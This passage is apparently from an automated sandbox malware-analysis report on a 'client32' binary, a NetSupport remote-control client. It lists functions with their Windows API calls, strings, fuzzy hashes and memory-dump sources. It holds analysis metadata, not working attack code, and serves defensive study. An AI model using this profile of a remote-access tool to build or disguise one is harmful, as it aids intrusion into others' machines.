                                                                                                                                                                • String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 1183979061-1830555902
                                                                                                                                                                • Opcode ID: d4857ee76d8c1cc660dc759cc083975ead6eda15deae3702bc20d4af1b2e1f25
                                                                                                                                                                • Instruction ID: 30908e59175280b9c57392d60f9ec8946edd900dc556d0c581b30970aad7595d
                                                                                                                                                                • Opcode Fuzzy Hash: d4857ee76d8c1cc660dc759cc083975ead6eda15deae3702bc20d4af1b2e1f25
                                                                                                                                                                • Instruction Fuzzy Hash: C641D67990031A9FCB01CFA4CC80FEEB7B9EF85258F044169E856A7640EA35F909C7A0
                                                                                                                                                                Function 11103590 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 137libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,59FD48C0), ref: 11103683
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadExecutionState), ref: 111036C7
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11103704
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 111036DB
                                                                                                                                                                Strings
                                                                                                                                                                • *DisableHighPerfPower, xrefs: 111035FA
                                                                                                                                                                • Prevent Power Save (new count=%d,%d), same state=x%x, xrefs: 11103721
                                                                                                                                                                • Client, xrefs: 111035CB, 111035FF
                                                                                                                                                                • *DisablePreventPowerSave, xrefs: 111035C6
                                                                                                                                                                • Kernel32.dll, xrefs: 11103678
                                                                                                                                                                • SetThreadExecutionState, xrefs: 111036BE
                                                                                                                                                                • Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x, xrefs: 111036F2
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressErrorFreeLastLoadProc__wcstoi64
                                                                                                                                                                • String ID: *DisableHighPerfPower$*DisablePreventPowerSave$Client$Kernel32.dll$Prevent Power Save (new count=%d,%d), same state=x%x$Prevent Power Save (new count=%d,%d, newstate=x%x), prevstate=x%x$SetThreadExecutionState
                                                                                                                                                                • API String ID: 338032539-196928431
                                                                                                                                                                • Opcode ID: feae159db528dffda90684d517b825e3f9fab515b4a0bbcf643c119d50c48f6c
                                                                                                                                                                • Instruction ID: ef519489baa259d01bcb28758cb3490bfea909c894c6be1ca2e5c40dbc525e6f
                                                                                                                                                                • Opcode Fuzzy Hash: feae159db528dffda90684d517b825e3f9fab515b4a0bbcf643c119d50c48f6c
                                                                                                                                                                • Instruction Fuzzy Hash: B8418CB5D0465AAFEB00DF9ACDD0AAEFBB5FB48358F51803EE425A3200D7301904CB61
                                                                                                                                                                Function 11029450 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 97windowCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11143DE0: GetTickCount.KERNEL32 ref: 11143E48
                                                                                                                                                                • wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                • MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • _strrchr.LIBCMT ref: 11029545
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 11029584
                                                                                                                                                                Strings
                                                                                                                                                                • Info. assert, restarting..., xrefs: 1102956D
                                                                                                                                                                • V12.10F8, xrefs: 110294A3
                                                                                                                                                                • Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029486
                                                                                                                                                                • Client32, xrefs: 110294E5
                                                                                                                                                                • Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 110294B1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
                                                                                                                                                                • String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F8
                                                                                                                                                                • API String ID: 2763122592-3574328345
                                                                                                                                                                • Opcode ID: ba3a97c916ab28f337fc545cafdf3d966e22a8156ced65e074ee0ba6a9a7b855
                                                                                                                                                                • Instruction ID: a7fd37a067bb091250c1763d922fd72d2c7afa3a6e549ffd9321a47320cd30d9
                                                                                                                                                                • Opcode Fuzzy Hash: ba3a97c916ab28f337fc545cafdf3d966e22a8156ced65e074ee0ba6a9a7b855
                                                                                                                                                                • Instruction Fuzzy Hash: D631D975A01226AFEB11DFE5CCC5FBAB768EB5874CF840024F62587184E670A940C761
                                                                                                                                                                Function 111235D0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • GetVersionExA.KERNEL32(?,View,*NoHideFEP,00000000,00000000,00000001), ref: 1112362F
                                                                                                                                                                • InterlockedExchange.KERNEL32(111F09B4,00000001), ref: 11123655
                                                                                                                                                                • CreateWindowExA.USER32(00000000,button,11194244,50000000,FFFFEC78,00000000,00000014,0000000E,?,00000001,00000000,00000000), ref: 1112369B
                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,11123550), ref: 111236BB
                                                                                                                                                                • SetFocus.USER32(00000000), ref: 111236D2
                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 111236EC
                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 11123702
                                                                                                                                                                • InterlockedExchange.KERNEL32(111F09B4,00000000), ref: 11123719
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ExchangeInterlockedLong$CreateDestroyFocusVersion__wcstoi64
                                                                                                                                                                • String ID: *NoHideFEP$View$button
                                                                                                                                                                • API String ID: 1610953178-1502386645
                                                                                                                                                                • Opcode ID: bdef63e06481d9c0dc03333f194d18eebb477b9bb77329bd89e458592d6cd94a
                                                                                                                                                                • Instruction ID: c38b7b7754d3323b213173b0c8c3b4f9dac41d230a1c05010704e98145613ebf
                                                                                                                                                                • Opcode Fuzzy Hash: bdef63e06481d9c0dc03333f194d18eebb477b9bb77329bd89e458592d6cd94a
                                                                                                                                                                • Instruction Fuzzy Hash: 4F31857061972AABF710DF75CD98B66F7A9FB48718F900128E529D3284FB70A644CB10
                                                                                                                                                                Function 1100D550 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110EDEB0: LocalAlloc.KERNEL32(00000040,00000014,?,1100D56F,?), ref: 110EDEC0
                                                                                                                                                                  • Part of subcall function 110EDEB0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D56F,?), ref: 110EDED2
                                                                                                                                                                  • Part of subcall function 110EDEB0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D56F,?), ref: 110EDEE4
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D587
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5A0
                                                                                                                                                                • _strrchr.LIBCMT ref: 1100D5AF
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1100D5BF
                                                                                                                                                                • wsprintfA.USER32 ref: 1100D5E0
                                                                                                                                                                • _memset.LIBCMT ref: 1100D5F1
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D629
                                                                                                                                                                • CloseHandle.KERNEL32(?,00000000), ref: 1100D641
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1100D64A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                                                                                                • String ID: %sNSSilence.exe %u %u$D
                                                                                                                                                                • API String ID: 1760462761-4146734959
                                                                                                                                                                • Opcode ID: 556463406fd45f230dce5971ebf4bdbc680ec1c7ea4d85616804ce8ee19078f8
                                                                                                                                                                • Instruction ID: 28a4ee404c217c6c44ddb94e78ca55d5cfefd79278ecf37e22d28a51988c4013
                                                                                                                                                                • Opcode Fuzzy Hash: 556463406fd45f230dce5971ebf4bdbc680ec1c7ea4d85616804ce8ee19078f8
                                                                                                                                                                • Instruction Fuzzy Hash: 78219675A51328ABEB24DBA0CC4AFDEB77CAB08704F104095F619A71C0DAB1BA44CF64
                                                                                                                                                                Function 110B7920 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 79libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7946
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 110B794D
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000), ref: 110B7963
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 110B7981
                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 110B798B
                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 110B799E
                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,0000000C(TokenIntegrityLevel),111E6258,00000004,?), ref: 110B79BD
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B79E4
                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 110B79EB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Handle$CloseCurrentOpenToken$AddressInformationModuleProc
                                                                                                                                                                • String ID: ProcessIdToSessionId$kernel32.dll
                                                                                                                                                                • API String ID: 2536908267-3889420803
                                                                                                                                                                • Opcode ID: 9ce2d9c11117e9125f749d9db0dd3fd4a1ffca137de9545352435600f6621f01
                                                                                                                                                                • Instruction ID: 695a2acb687fdaf8883a4263dd52dcf391b9a11c2ad5aa445e7569b8d51d2e52
                                                                                                                                                                • Opcode Fuzzy Hash: 9ce2d9c11117e9125f749d9db0dd3fd4a1ffca137de9545352435600f6621f01
                                                                                                                                                                • Instruction Fuzzy Hash: 5721C839E04629A7EB11DBF5DC88F5EBBACEB84719F040165E914E3284DB74D900C750
                                                                                                                                                                Function 11137340 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(00000000,75730BD0,00000000), ref: 11137363
                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 11137384
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 11137394
                                                                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 111373B1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoA), ref: 111373BD
                                                                                                                                                                • _memset.LIBCMT ref: 111373D7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProc$Version_memset
                                                                                                                                                                • String ID: KERNEL32.DLL$Terminal Server$VerSetConditionMask$VerifyVersionInfoA$ntdll.dll
                                                                                                                                                                • API String ID: 1659045089-3162170060
                                                                                                                                                                • Opcode ID: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                                                                                • Instruction ID: 0c0b10a14524f440857339b23279ac9494b8b75ce88d62c7832b422cfd240681
                                                                                                                                                                • Opcode Fuzzy Hash: 2782e45080b00d7644363843fb4dac8f82773bfcd6b8b8724ba95a014df5fc97
                                                                                                                                                                • Instruction Fuzzy Hash: CB216A70F10329ABF720AB71AD44F5AFFA99B8871AF000474E914A7189EA71B9048765
                                                                                                                                                                Function 11009930 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strtok$_malloc
                                                                                                                                                                • String ID: *extra_bytes$..\ctl32\AUDIO.CPP$Audio$Send EV_CONFIGSET from %s@%d$nbytes <= sizeof (extra_bytes)
                                                                                                                                                                • API String ID: 665538724-3655815180
                                                                                                                                                                • Opcode ID: 0558b598ecd220540cf28659b61802d1f99bc554e79b0dd51561b40af61ee09d
                                                                                                                                                                • Instruction ID: 7c42a3c617dbeb8788080eb1c781ab60080519317ae9ccae606f49ba2c162057
                                                                                                                                                                • Opcode Fuzzy Hash: 0558b598ecd220540cf28659b61802d1f99bc554e79b0dd51561b40af61ee09d
                                                                                                                                                                • Instruction Fuzzy Hash: 49A15774E012299FEB61CF24CC40BDAB7F4AF49744F1480EAD99DA7241E771AA84CF91
                                                                                                                                                                Function 110390F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 1103910C
                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 11039113
                                                                                                                                                                • _memset.LIBCMT ref: 11039131
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000044D,?,00000080), ref: 11039183
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000044F,00000000,00000080), ref: 110391EB
                                                                                                                                                                • GetDlgItemTextA.USER32(?,000004BE,00000000,00000080), ref: 1103924E
                                                                                                                                                                • GetDlgItemTextA.USER32(?,000017EC,00000000,00000080), ref: 110392B1
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000048E,00000000,00000080), ref: 11039377
                                                                                                                                                                • GetDlgItemTextA.USER32(?,0000048D,00000000,00000080), ref: 11039314
                                                                                                                                                                  • Part of subcall function 11142800: _strncpy.LIBCMT ref: 11142824
                                                                                                                                                                  • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
